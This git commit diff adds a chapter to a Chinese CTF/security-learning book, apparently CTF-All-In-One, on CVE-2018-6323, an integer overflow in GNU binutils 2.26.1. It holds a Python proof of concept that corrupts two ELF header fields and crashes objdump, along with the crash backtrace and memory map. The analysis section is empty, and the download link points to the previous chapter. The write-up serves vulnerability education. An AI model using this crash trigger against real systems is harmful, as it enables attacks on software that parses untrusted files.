add 7.1.7

This commit is contained in:
firmianay 2018-02-15 12:25:53 +08:00
parent c9a2f60561
commit fc5f1837ce
6 changed files with 140 additions and 7 deletions

2
FAQ.md
View File

@ -18,7 +18,7 @@ CTF 是网络安全技术人员之间进行技术竞技的一种比赛形式,
- 有 pdf/epub/mobi 版本吗?
epub/mobi 版本。暂时有 pdf,可在 GitBook 页面下载,未来考虑使用 Tex/LaTex 编写和编译,以提供更美观的 pdf。
有,可在 GitBook 页面下载,未来考虑使用 Tex/LaTex 编写和编译,以提供更美观的 pdf。
- 我能打印本书或者作为教材教课吗?

View File

@ -22,6 +22,10 @@ PDF 文件地址:
---
请查看 [CONTRIBUTION.md](CONTRIBUTION.md)
常见问题
---
请查看 [FAQ.md](FAQ.md)
致谢
---
请查看 [THANKS](THANKS)

View File

@ -132,6 +132,7 @@ GitHub 地址https://github.com/firmianay/CTF-All-In-One
* [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](doc/7.1.4_wget_2017-13089.md)
* [7.1.5 [CVE2018-1000001] glibc Buffer Underflow](doc/7.1.5_glibc_2018-1000001.md)
* [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](doc/7.1.6_dnstracer_2017-9430.md)
* [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](doc/7.1.7_binutils_2018-6323.md)
* [八、附录](doc/8_appendix.md)
* [8.1 更多 Linux 工具](doc/8.1_Linuxtools.md)
* [8.2 更多 Windows 工具](doc/8.2_wintools.md)

View File

@ -0,0 +1,110 @@
# 7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow
- [漏洞描述](#漏洞描述)
- [漏洞复现](#漏洞复现)
- [漏洞分析](#漏洞分析)
- [参考资料](#参考资料)
[下载文件](../src/exploit/7.1.6_dnstracer_2017-9430)
## 漏洞描述
## 漏洞复现
| |推荐使用的环境 | 备注 |
| --- | --- | --- |
| 操作系统 | Ubuntu 16.04 | 体系结构64 位 |
| 调试器 | gdb-peda| 版本号7.11.1 |
| 漏洞软件 | binutils | 版本号2.26.1 |
编译安装 binutils
```
$ wget https://ftp.gnu.org/gnu/binutils/binutils-2.26.1.tar.gz
$ tar zxvf binutils-2.26.1.tar.gz
$ cd binutils-2.26.1/
$ ./configure --enable-64-bit-bfd
$ make && sudo make install
$ file /usr/local/bin/objdump
/usr/local/bin/objdump: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=72a5ff5705687fd1aa6ee58aff08d57b87694cb4, not stripped
```
使用 PoC 如下:
```python
import os
hello = "#include<stdio.h>\nint main(){printf(\"HelloWorld!\\n\"); return 0;}"
f = open("helloWorld.c", 'w')
f.write(hello)
f.close()
os.system("gcc -c helloWorld.c -o test")
f = open("test", 'rb+')
f.read(0x2c)
f.write("\xff\xff") # 65535
f.read(0x244-0x2c-2)
f.write("\x00\x00\x00\x20") # 536870912
f.close()
os.system("objdump -x test")
```
```
$ python poc.py
objdump: test: File truncated
*** Error in `objdump': free(): invalid pointer: 0x09803aa8 ***
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x67377)[0xb75ef377]
/lib/i386-linux-gnu/libc.so.6(+0x6d2f7)[0xb75f52f7]
/lib/i386-linux-gnu/libc.so.6(+0x6dc31)[0xb75f5c31]
objdump[0x81421cb]
objdump[0x8091ab0]
objdump[0x809349c]
objdump[0x809400a]
objdump[0x80522aa]
objdump[0x804c17e]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf7)[0xb75a0637]
objdump[0x804c38a]
======= Memory map: ========
08048000-0822c000 r-xp 00000000 08:01 270806 /usr/local/bin/objdump
0822c000-0822d000 r--p 001e3000 08:01 270806 /usr/local/bin/objdump
0822d000-08231000 rw-p 001e4000 08:01 270806 /usr/local/bin/objdump
08231000-08237000 rw-p 00000000 00:00 0
09802000-09823000 rw-p 00000000 00:00 0 [heap]
b7200000-b7221000 rw-p 00000000 00:00 0
b7221000-b7300000 ---p 00000000 00:00 0
b7353000-b736f000 r-xp 00000000 08:01 394789 /lib/i386-linux-gnu/libgcc_s.so.1
b736f000-b7370000 rw-p 0001b000 08:01 394789 /lib/i386-linux-gnu/libgcc_s.so.1
b7387000-b7587000 r--p 00000000 08:01 141924 /usr/lib/locale/locale-archive
b7587000-b7588000 rw-p 00000000 00:00 0
b7588000-b7738000 r-xp 00000000 08:01 394751 /lib/i386-linux-gnu/libc-2.23.so
b7738000-b773a000 r--p 001af000 08:01 394751 /lib/i386-linux-gnu/libc-2.23.so
b773a000-b773b000 rw-p 001b1000 08:01 394751 /lib/i386-linux-gnu/libc-2.23.so
b773b000-b773e000 rw-p 00000000 00:00 0
b773e000-b7741000 r-xp 00000000 08:01 394775 /lib/i386-linux-gnu/libdl-2.23.so
b7741000-b7742000 r--p 00002000 08:01 394775 /lib/i386-linux-gnu/libdl-2.23.so
b7742000-b7743000 rw-p 00003000 08:01 394775 /lib/i386-linux-gnu/libdl-2.23.so
b7751000-b7752000 rw-p 00000000 00:00 0
b7752000-b7759000 r--s 00000000 08:01 139343 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache
b7759000-b775a000 r--p 00741000 08:01 141924 /usr/lib/locale/locale-archive
b775a000-b775c000 rw-p 00000000 00:00 0
b775c000-b775e000 r--p 00000000 00:00 0 [vvar]
b775e000-b7760000 r-xp 00000000 00:00 0 [vdso]
b7760000-b7782000 r-xp 00000000 08:01 394723 /lib/i386-linux-gnu/ld-2.23.so
b7782000-b7783000 rw-p 00000000 00:00 0
b7783000-b7784000 r--p 00022000 08:01 394723 /lib/i386-linux-gnu/ld-2.23.so
b7784000-b7785000 rw-p 00023000 08:01 394723 /lib/i386-linux-gnu/ld-2.23.so
bf85b000-bf87c000 rw-p 00000000 00:00 0 [stack]
Aborted (core dumped)
```
需要注意的是如果在 configure 的时候没有使用参数 `--enable-64-bit-bfd`,将会出现下面的结果:
```
$ python poc.py
objdump: test: File format not recognized
```
## 漏洞分析
## 参考资料
- [GNU binutils 2.26.1 - Integer Overflow (POC)](https://www.exploit-db.com/exploits/44035/)

View File

@ -1,8 +1,9 @@
# 第七篇 实战篇
- [7.1.1 [CVE-2017-11543] tcpdump 4.9.0 Buffer Overflow](7.1.1_tcpdump_2017-11543.md)
- [7.1.2 [CVE-2015-0235] glibc 2.17 Buffer Overflow](7.1.2_glibc_2015-0235.md)
- [7.1.3 [CVE-2016-4971] wget 1.17.1 Arbitrary File Upload](7.1.3_wget_2016-4971.md)
- [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](7.1.4_wget_2017-13089.md)
- [7.1.5 [CVE2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md)
- [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md)
- [7.1.1 [CVE-2017-11543] tcpdump 4.9.0 Buffer Overflow](7.1.1_tcpdump_2017-11543.md)
- [7.1.2 [CVE-2015-0235] glibc 2.17 Buffer Overflow](7.1.2_glibc_2015-0235.md)
- [7.1.3 [CVE-2016-4971] wget 1.17.1 Arbitrary File Upload](7.1.3_wget_2016-4971.md)
- [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](7.1.4_wget_2017-13089.md)
- [7.1.5 [CVE2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md)
- [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md)
- [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](7.1.7_binutils_2018-6323.md)

View File

@ -0,0 +1,17 @@
import os
hello = "#include<stdio.h>\nint main(){printf(\"HelloWorld!\\n\"); return 0;}"
f = open("helloWorld.c", 'w')
f.write(hello)
f.close()
os.system("gcc -c helloWorld.c -o test")
f = open("test", 'rb+')
f.read(0x2c)
f.write("\xff\xff") # 65535
f.read(0x244-0x2c-2)
f.write("\x00\x00\x00\x20") # 536870912
f.close()
os.system("objdump -x test")